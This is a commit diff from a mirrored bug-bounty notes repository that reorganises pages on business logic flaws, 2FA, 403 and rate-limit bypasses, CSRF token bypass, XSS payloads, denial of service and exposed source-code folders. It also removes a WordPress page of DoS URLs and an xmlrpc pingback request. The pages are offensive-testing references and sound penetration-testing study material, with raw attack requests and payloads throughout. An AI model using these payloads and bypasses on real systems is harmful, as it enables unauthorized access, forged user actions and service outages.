mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
Update structure each readme
This commit is contained in:
parent
6d21ea34ed
commit
a2c07348e3
@ -1,9 +1,9 @@
|
|||||||
# Business Logic Errors
|
# Business Logic Errors
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
|
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
|
||||||
|
|
||||||
## **How to Find**
|
## How to find
|
||||||
1. Review Functionality
|
1. Review Functionality
|
||||||
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
|
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
|
||||||
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
|
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
|
||||||
@ -54,5 +54,5 @@ Business Logic Errors are ways of using the legitimate processing flow of an app
|
|||||||
- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
|
- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
|
||||||
- Response Manipulation to bypass certain restrictions such as 2FA Bypass
|
- Response Manipulation to bypass certain restrictions such as 2FA Bypass
|
||||||
|
|
||||||
Reference:
|
## References
|
||||||
- [@harshbothra_](https://twitter.com/harshbothra_)
|
* [@harshbothra_](https://twitter.com/harshbothra_)
|
@ -1,4 +1,4 @@
|
|||||||
# 2FA Bypass
|
# Bypass Two-Factor Authentication
|
||||||
|
|
||||||
1. Response manipulation
|
1. Response manipulation
|
||||||
|
|
||||||
@ -90,4 +90,6 @@ Host: vuln.com
|
|||||||
code=null
|
code=null
|
||||||
```
|
```
|
||||||
|
|
||||||
Source: [Harsh Bothra](https://twitter.com/harshbothra_) and other writeup
|
## References
|
||||||
|
* [Harsh Bothra](https://twitter.com/harshbothra_)
|
||||||
|
* Other writeup
|
@ -1,4 +1,4 @@
|
|||||||
# 304 Not Modified Bypass
|
# Bypass 304 (Not Modified)
|
||||||
|
|
||||||
1. Delete "If-None-Match" header
|
1. Delete "If-None-Match" header
|
||||||
```
|
```
|
||||||
@ -26,4 +26,5 @@ Host: target.com
|
|||||||
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
|
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
|
||||||
```
|
```
|
||||||
|
|
||||||
Source: [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
|
## References
|
||||||
|
* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
|
||||||
|
@ -1,11 +1,5 @@
|
|||||||
# 403 Forbidden Bypass
|
# Bypass 403 (Forbidden)
|
||||||
|
|
||||||
## Tools
|
|
||||||
|
|
||||||
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
|
||||||
|
|
||||||
|
|
||||||
## Exploit
|
|
||||||
1. Using "X-Original-URL" header
|
1. Using "X-Original-URL" header
|
||||||
```
|
```
|
||||||
GET /admin HTTP/1.1
|
GET /admin HTTP/1.1
|
||||||
@ -67,6 +61,9 @@ Host: victim.com
|
|||||||
X-Original-URL: /admin
|
X-Original-URL: /admin
|
||||||
```
|
```
|
||||||
|
|
||||||
Source:
|
## Tools
|
||||||
|
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
||||||
|
|
||||||
|
## References
|
||||||
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||||
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
||||||
|
@ -1,4 +1,5 @@
|
|||||||
# 429 Rate limit Bypass
|
# Bypass 429 (Too Many Requests)
|
||||||
|
|
||||||
1. Try add some custom header
|
1. Try add some custom header
|
||||||
```
|
```
|
||||||
X-Forwarded-For : 127.0.0.1
|
X-Forwarded-For : 127.0.0.1
|
||||||
@ -79,3 +80,7 @@ Host: target.com
|
|||||||
|
|
||||||
{"email":"victim@gmail.com "}
|
{"email":"victim@gmail.com "}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd)
|
||||||
|
* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be)
|
120
Bypass/Bypass CSRF.md
Normal file
120
Bypass/Bypass CSRF.md
Normal file
@ -0,0 +1,120 @@
|
|||||||
|
# Bypass CSRF
|
||||||
|
|
||||||
|
1. Change single character
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Sending empty value of token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Replace the token with same length
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaabaa
|
||||||
|
```
|
||||||
|
4. Changing POST / GET method
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Remove the token from request
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
||||||
|
```
|
||||||
|
Try this to bypass
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Use another user's valid token
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Try to decrypt hash
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=MTIzNDU2
|
||||||
|
```
|
||||||
|
MTIzNDU2 => 123456 with base64
|
||||||
|
|
||||||
|
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
||||||
|
```
|
||||||
|
When we register again, the request like this
|
||||||
|
```
|
||||||
|
POST /register HTTP/1.1
|
||||||
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
|
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
||||||
|
```
|
||||||
|
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
@ -1,4 +1,5 @@
|
|||||||
# Bypass Captcha
|
# Bypass Captcha
|
||||||
|
|
||||||
1. Try changing the request method, for example POST to GET
|
1. Try changing the request method, for example POST to GET
|
||||||
```
|
```
|
||||||
POST / HTTP 1.1
|
POST / HTTP 1.1
|
||||||
|
@ -1,69 +0,0 @@
|
|||||||
# WordPress Common Bugs
|
|
||||||
|
|
||||||
1. Denial of Service via load-scripts.php
|
|
||||||
```
|
|
||||||
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Denial of Service via load-styles.php
|
|
||||||
```
|
|
||||||
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
|
|
||||||
```
|
|
||||||
|
|
||||||
3. Log files exposed
|
|
||||||
```
|
|
||||||
http://target.com/wp-content/debug.log
|
|
||||||
```
|
|
||||||
|
|
||||||
4. Backup file wp-config exposed
|
|
||||||
```
|
|
||||||
.wp-config.php.swp
|
|
||||||
wp-config.inc
|
|
||||||
wp-config.old
|
|
||||||
wp-config.txt
|
|
||||||
wp-config.html
|
|
||||||
wp-config.php.bak
|
|
||||||
wp-config.php.dist
|
|
||||||
wp-config.php.inc
|
|
||||||
wp-config.php.old
|
|
||||||
wp-config.php.save
|
|
||||||
wp-config.php.swp
|
|
||||||
wp-config.php.txt
|
|
||||||
wp-config.php.zip
|
|
||||||
wp-config.php.html
|
|
||||||
wp-config.php~
|
|
||||||
```
|
|
||||||
|
|
||||||
5. Information disclosure wordpress username
|
|
||||||
```
|
|
||||||
http://target.com/?author=1
|
|
||||||
```
|
|
||||||
```
|
|
||||||
http://target.com/wp-json/wp/v2/users
|
|
||||||
http://target.com/?rest_route=/wp/v2/users
|
|
||||||
```
|
|
||||||
|
|
||||||
6. Bruteforce in wp-login.php
|
|
||||||
```
|
|
||||||
POST /wp-login.php HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
|
|
||||||
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
|
|
||||||
```
|
|
||||||
|
|
||||||
7. XSPA in wordpress
|
|
||||||
```
|
|
||||||
POST /xmlrpc.php HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
|
|
||||||
<methodCall>
|
|
||||||
<methodName>pingback.ping</methodName>
|
|
||||||
<params><param>
|
|
||||||
<value><string>http://yourip:port</string></value>
|
|
||||||
</param><param>
|
|
||||||
<value>
|
|
||||||
<string>https://target.com></string>
|
|
||||||
</value>
|
|
||||||
</param></params>
|
|
||||||
</methodCall>
|
|
||||||
```
|
|
@ -1,9 +1,9 @@
|
|||||||
# Cross Site Request Forgery (CSRF)
|
# Cross Site Request Forgery (CSRF)
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||||
|
|
||||||
## How to Find
|
## How to exploit
|
||||||
|
|
||||||
1. HTML GET Method
|
1. HTML GET Method
|
||||||
|
|
||||||
```html
|
```html
|
||||||
@ -37,124 +37,4 @@ xhr.withCredentials = true;
|
|||||||
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
|
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
|
||||||
xhr.send('{"role":admin}');
|
xhr.send('{"role":admin}');
|
||||||
</script>
|
</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Bypass CSRF Token
|
|
||||||
1. Change single character
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
|
|
||||||
```
|
|
||||||
|
|
||||||
2. Sending empty value of token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=
|
|
||||||
```
|
|
||||||
|
|
||||||
3. Replace the token with same length
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaabaa
|
|
||||||
```
|
|
||||||
4. Changing POST / GET method
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
```
|
|
||||||
|
|
||||||
5. Remove the token from request
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
|
|
||||||
```
|
|
||||||
Try this to bypass
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456
|
|
||||||
```
|
|
||||||
|
|
||||||
6. Use another user's valid token
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
|
|
||||||
```
|
|
||||||
|
|
||||||
7. Try to decrypt hash
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=MTIzNDU2
|
|
||||||
```
|
|
||||||
MTIzNDU2 => 123456 with base64
|
|
||||||
|
|
||||||
8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j123
|
|
||||||
```
|
|
||||||
When we register again, the request like this
|
|
||||||
```
|
|
||||||
POST /register HTTP/1.1
|
|
||||||
Host: target.com
|
|
||||||
[...]
|
|
||||||
|
|
||||||
username=dapos&password=123456&token=vi802jg9f8akd9j124
|
|
||||||
```
|
|
||||||
If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
|
|
@ -1,6 +1,6 @@
|
|||||||
# XSS Cheat Sheet (Basic)
|
# XSS Cheat Sheet (Basic)
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
|
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
|
||||||
- Reflected XSS
|
- Reflected XSS
|
||||||
|
|
||||||
@ -12,7 +12,7 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s
|
|||||||
|
|
||||||
A type of XSS that has payloads found in the DOM rather than within the HTML code.
|
A type of XSS that has payloads found in the DOM rather than within the HTML code.
|
||||||
|
|
||||||
## **Payloads**
|
## **How to exploit**
|
||||||
1. Basic payload
|
1. Basic payload
|
||||||
```html
|
```html
|
||||||
<script>alert(1)</script>
|
<script>alert(1)</script>
|
||||||
@ -381,5 +381,6 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
|||||||
<img ignored=() src=x onerror=prompt(1)>
|
<img ignored=() src=x onerror=prompt(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
Reference:
|
## References
|
||||||
- [Brute Logic](https://brutelogic.com.br/)
|
- [Brute Logic](https://brutelogic.com.br/)
|
||||||
|
- Some random twitter posts
|
@ -1,27 +1,28 @@
|
|||||||
# Denial of Service
|
# Denial of Service
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
|
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
|
||||||
## **How to Find**
|
## How to FInd
|
||||||
|
|
||||||
1. Cookie bomb
|
1. Cookie bomb
|
||||||
|
|
||||||
```
|
```
|
||||||
https://target.com/index.php?param1=xxxxxxxxxxxxxx
|
https://target.com/index.php?param1=xxxxxxxxxxxxxx
|
||||||
```
|
```
|
||||||
After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
|
After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
|
||||||
|
|
||||||
2. Try input a very long payload to form. For example using very long password or using very long email
|
2. Try input a very long payload to form. For example using very long password or using very long email
|
||||||
```
|
```
|
||||||
POST /Register
|
POST /Register HTTP/1.1
|
||||||
[...]
|
Host: target.com
|
||||||
|
[...]
|
||||||
|
|
||||||
username=victim&password=aaaaaaaaaaaaaaa
|
username=victim&password=aaaaaaaaaaaaaaa
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Pixel flood, using image with a huge pixels
|
3. Pixel flood, using image with a huge pixels
|
||||||
|
|
||||||
Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0)
|
Download the payload: [Here](https://daffa.tech/lottapixel3.jpg)
|
||||||
|
|
||||||
4. Frame flood, using GIF with a huge frame
|
4. Frame flood, using GIF with a huge frame
|
||||||
|
|
||||||
@ -112,7 +113,7 @@ Accept-Encoding: gzip, gzip, deflate, br, br
|
|||||||
|
|
||||||
![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)
|
![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)
|
||||||
|
|
||||||
References:
|
## References
|
||||||
- [Hackerone #840598](https://hackerone.com/reports/840598)
|
- [Hackerone #840598](https://hackerone.com/reports/840598)
|
||||||
- [Hackerone #105363](https://hackerone.com/reports/105363)
|
- [Hackerone #105363](https://hackerone.com/reports/105363)
|
||||||
- [Hackerone #390](https://hackerone.com/reports/390)
|
- [Hackerone #390](https://hackerone.com/reports/390)
|
||||||
|
@ -1,42 +1,58 @@
|
|||||||
# Exposed Source Code
|
# Exposed Source Code
|
||||||
|
|
||||||
## **Introduction**
|
## Introduction
|
||||||
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
|
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
|
||||||
|
|
||||||
## **How to Find**
|
## How to FInd
|
||||||
1. Exposed Git folder
|
1. Exposed Git folder
|
||||||
```
|
```
|
||||||
https://site.com/.git
|
https://site.com/.git
|
||||||
```
|
```
|
||||||
![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png)
|
![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png)
|
||||||
|
|
||||||
|
Tools to dump .git
|
||||||
|
* https://github.com/arthaud/git-dumper
|
||||||
|
|
||||||
2. Exposed Subversion folder
|
2. Exposed Subversion folder
|
||||||
```
|
```
|
||||||
https://site.com/.svn
|
https://site.com/.svn
|
||||||
```
|
```
|
||||||
![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png)
|
![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png)
|
||||||
|
|
||||||
|
Tools to dump .svn
|
||||||
|
* https://github.com/anantshri/svn-extractor
|
||||||
|
|
||||||
3. Exposed Mercurial folder
|
3. Exposed Mercurial folder
|
||||||
```
|
```
|
||||||
https://site.com/.hg
|
https://site.com/.hg
|
||||||
```
|
```
|
||||||
![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png)
|
![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png)
|
||||||
|
|
||||||
|
Tools to dump .hg
|
||||||
|
* https://github.com/arthaud/hg-dumper
|
||||||
|
|
||||||
4. Exposed Bazaar folder
|
4. Exposed Bazaar folder
|
||||||
```
|
```
|
||||||
http://target.com/.bzr
|
http://target.com/.bzr
|
||||||
```
|
```
|
||||||
![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
|
![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
|
||||||
|
|
||||||
|
Tools to dump .bzr
|
||||||
|
* https://github.com/shpik-kr/bzr_dumper
|
||||||
|
|
||||||
